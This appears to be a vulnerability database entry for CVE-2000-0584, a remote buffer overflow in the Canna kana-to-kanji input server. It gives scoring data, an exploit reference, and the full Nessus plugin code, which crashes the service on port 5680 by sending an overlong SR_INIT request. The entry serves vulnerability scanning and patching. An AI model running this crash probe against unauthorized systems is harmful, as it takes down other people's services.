Vulnerabilities > CVE-2000-0584

047910
CVSS 10.0 - CRITICAL
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
COMPLETE
Integrity impact
COMPLETE
Availability impact
COMPLETE
network
low complexity
debian
freebsd
critical
nessus
exploit available
NVD
Published: 2000-07-02
Updated: 2018-05-03

Summary

Buffer overflow in Canna input system allows remote attackers to execute arbitrary commands via an SR_INIT command with a long user name or group name.

Vulnerable Configurations

Part Description Count
OS
Debian
1
OS
Freebsd
1

Exploit-Db

descriptionCanna Canna 3.5 b2 Remote Buffer Overflow Vulnerability. CVE-2000-0584 . Remote exploit for linux platform
idEDB-ID:20061
last seen2016-02-02
modified2000-07-02
published2000-07-02
reporterUNYUN
sourcehttps://www.exploit-db.com/download/20061/
titleCanna Canna 3.5 b2 - Remote Buffer Overflow Vulnerability

Nessus

NASL familyGain a shell remotely
NASL idCANNA_OVERFLOW.NASL
descriptionThe remote host is running Canna, a service that processes Japanese input and translates it from kana to kanji. It was possible to make the remote Canna server crash by sending a SR_INIT command with a very long string. A remote attacker could use this to crash the service, or possibly execute arbitrary code.
last seen2020-06-01
modified2020-06-02
plugin id11114
published2002-08-29
reporterThis script is Copyright (C) 2002-2018 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/11114
titleCanna SR_INIT Command Remote Overflow
code
#
# (C) Tenable Network Security, Inc.
#


include("compat.inc");


if(description)
{
 script_id(11114);
 script_bugtraq_id(1445);
 script_version ("1.14");
 script_cve_id("CVE-2000-0584");
 script_name(english:"Canna SR_INIT Command Remote Overflow");
 script_summary(english:"Checks if the remote Canna can be buffer overflown");

 script_set_attribute(attribute:"synopsis", value:
"The remote language translation service has a buffer overflow
vulnerability." );
 script_set_attribute(attribute:"description", value:
"The remote host is running Canna, a service that processes Japanese
input and translates it from kana to kanji.

It was possible to make the remote Canna server crash by sending a
SR_INIT command with a very long string.  A remote attacker could use
this to crash the service, or possibly execute arbitrary code." );
 # https://web.archive.org/web/20000819124158/http://archives.neohapsis.com/archives/vendor/2000-q2/0062.html
 script_set_attribute(
   attribute:"see_also",
   value:"http://www.nessus.org/u?5a347380"
 );
 script_set_attribute(
   attribute:"solution", 
   value:"Upgrade to the latest version of the software."
 );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
 script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
 script_set_attribute(attribute:"exploit_available", value:"true");
 script_set_attribute(attribute:"plugin_publication_date", value: "2002/08/29");
 script_set_attribute(attribute:"vuln_publication_date", value: "2000/07/05");
 script_cvs_date("Date: 2018/06/27 18:42:25");
 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_end_attributes();
		    
 script_category(ACT_DESTRUCTIVE_ATTACK);
 script_family(english:"Gain a shell remotely");
 
 script_copyright(english:"This script is Copyright (C) 2002-2018 Tenable Network Security, Inc.");
		  
 script_require_ports(5680);
 exit(0);
}

include("global_settings.inc");
include("misc_func.inc");

port = 5680;
if(!get_port_state(port))exit(0, "TCP port "+port+" is closed.");
soc = open_sock_tcp(port);
if(! soc) exit(1, "Cannot open TCP connection to port "+port+".");

  req = raw_string(0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 50) + 
        "3.3:" + crap(300) + raw_string(0);
  send(socket:soc, data:req);
  r = recv(socket:soc, length:4);
  close(soc);

if (service_is_dead(port: port, exit: 1) > 0)
  security_hole(port);

References